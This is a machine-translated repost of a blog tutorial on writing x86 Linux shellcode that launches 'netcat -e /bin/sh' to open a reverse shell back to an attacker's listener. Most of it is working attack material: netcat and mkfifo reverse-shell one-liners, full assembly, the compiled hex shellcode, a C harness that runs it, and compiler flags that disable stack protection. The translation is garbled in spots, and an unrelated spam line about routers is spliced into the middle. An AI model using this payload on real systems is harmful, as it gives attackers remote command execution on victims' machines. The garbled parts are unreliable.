Shellcode to bounce links using netcat

from:http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netcat/

This article is mainly about how to construct a shellcode when the remote overflow, in order to form an effective rebound link.

0x00 Reverse bind remote shell

There are many ways to establish a connection between a local host and a remote shell, most commonly by opening a port on a remote host and then

stdout/stderr/stdin

Redirect to a shell.

This allows us to connect to it via a simple netcat command on our own host.

However, in most cases this method does not work, many servers open only a small number of ports, such as HTTP (s), FTP,SMTP and so on.

Other packets are discarded directly by the firewall. The way to solve this problem is to use the rebound link, the rebound link means that the remote host to actively connect our server.

So, you need to open a port on your machine and wait for the hapless victim to connect to your host on its own.

0x01 netcat-e Command

First we assume that Netcat is installed on the target site.

Normally netcat supports the e parameter, which will run the program followed and bind it to the link.

If we /bin/sh bind through the e parameter and turn on listening, then when we use a remote host to connect to this host, it is equivalent to acquiring a shell. Let's try it out.

Running on local host

?

1	netcat -lvp 9999

Listen for links that are connected.

Open a new Shell to run

?

1	netcat -e /bin/sh 127.0.0.19999

In this way, your first shell will establish a link in which to execute ls whoami commands such as to test if it works properly,
You can also use CTRL + C to close this link.

Note: The OpenBSD version of Netcat does not support the-e or-c parameters.

You can use the following statements instead.

?

1	rm -f /tmp/f; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1| nc -l 127.0.0.1 9999> /tmp/f

But it's too complicated to run in Shellcode.

0X02 Assembly Code

Now let's take a look at how to put this statement through the Assembly and put it into the shellcode.

Here is the assembly code that we shellcode important to run. (Intel Syntax)

?

12345678910111213141516171819202122232425262728

jmp shortforwardback:pop             esixor             eax, eaxmov byte[esi + 11], al    ; terminate /bin/netcatmov byte [esi + 14], al    ; terminate -emov byte[esi + 22], al    ; terminate /bin/shmov byte[esi + 38], al    ; terminate 127.127.127.127mov byte[esi + 43], al    ; terminate 9999mov long[esi + 44], esi   ; address of /bin/netcat in AAAAlea             ebx, [esi + 12]   ; get address of -e  mov long[esi + 48], ebx   ; store address of -e in BBBBlea             ebx, [esi + 15]   ; get address of /bin/shmov long[esi + 52], ebx   ; store address of /bin/sh in CCCClea             ebx, [esi + 23]   ; get address of 127.127.127.127mov long[esi + 56], ebx   ; store address of 127.127.127.127 in DDDDlea             ebx, [esi + 39]   ; get address of 9999mov long[esi + 60], ebx   ; store address of 9999 in EEEEmov long [esi + 64], eax   ; put NULL in FFFFmov byteal, 0x0b; pass the execve syscall number as argumentmov             ebx, esi          lea             ecx, [esi + 44]   ; /bin/netcat -e /bin/sh etc etclea             edx, [esi + 64]   ; NULLint0x80; Run the execve syscallforward:call            backdb "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"

In fact, the above code to do the translation into C language is the following two lines

?

12	char*command[] = {"/bin/netcat", "-e", "/bin/sh", "127.127.127.127", "9999", NULL};execve(command[0], command, NULL);

The command is the following string

?

1	/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF

The parts of the string are # separated because NULL is not allowed in the shellcode, which causes the shellcode to be truncated so that it cannot be
The target host is running correctly.

No matter where we run this program, the first thing we need to know is the address of the command string.

So I created two labels (ForWord and back) on lines 1th and 26th, using the call command (27 lines), first putting the return address into the stack, the return address being the address of the next instruction, and the address of the next instruction is exactly our command string.

Back in line 3rd, we pop the command string address to the ESI register, and then initialize the EAX, noting that we cannot directly use the

?

1

mov eax,0

Because NULL is not allowed in Shellcode. Finally we, the command strings are stored separately into memory.

Router Setup password install win7 system tomorrow Rally stock wireless webcam WiFi router settings

In lines 5th through 9th, we move 0 of the register to the end of the string, using an alternative # (taken from the EAX register, where 0 uses XOR generation), we need an array of individual string addresses as the second parameter of the Execve ().

In line tenth, we put /bin/netcat the address in the AAAA location, 11 to 18 lines in the program are doing the same thing, the last 19 lines we put into the position of the FFFF, as the end of the string.

In line 20th we are ready to execute the system call, we first store the 0xb into eax, ESI (/bin/netcat address) stored in EBX, the address of the string is stored in, ECX, the last edx store null, then use 0X80 to trigger the system call, no accident, A rebound link instruction was executed successfully.

In this example, the IP address uses the 127.127.127.127 port number of 9999, which is a local IP address. Usually
You need to use an external IP to replace it, if the two IP length is different, you have to carefully modify all the assembly code associated with him.

0x03 Compiling test Shellcode

Now, we need to store the assembly code in an ASM file, which we call shell.asm, and compile it with the following statement.

?

1	nasm -felf32 -o shell.o shell.asm

Use, objdump -D command we can see the opcodes of this small program, using the following paragraph of instruction we can put them
Put into a C string

?

1	fori in $(objdump -d shell.o -M intel |grep "^ " |cut -f2); doecho -n ‘\x‘$i; done;echo

Finally we get

?

1

\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46

Finally, we use a C program to verify that the shell is viable.

?

1234567

char shellcode[] = "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46";int main(){    int (*ret)() = (int(*)())shellcode;    ret();}

To compile it, you need to turn off some secure compilation options and then use the following command.

?

1	gcc shellcode.c -fno-stack-protector -z execstack -o shellcode

Run in another shell netcat -lvp 9999 and run the C program ./shellcode if everything is right, you can get a rebound link shell.

en:http://blog.csdn.net/wgwgnihao/article/details/45933359

Cn:http://www.2cto.com/article/201404/292131.html

Shellcode to bounce links using netcat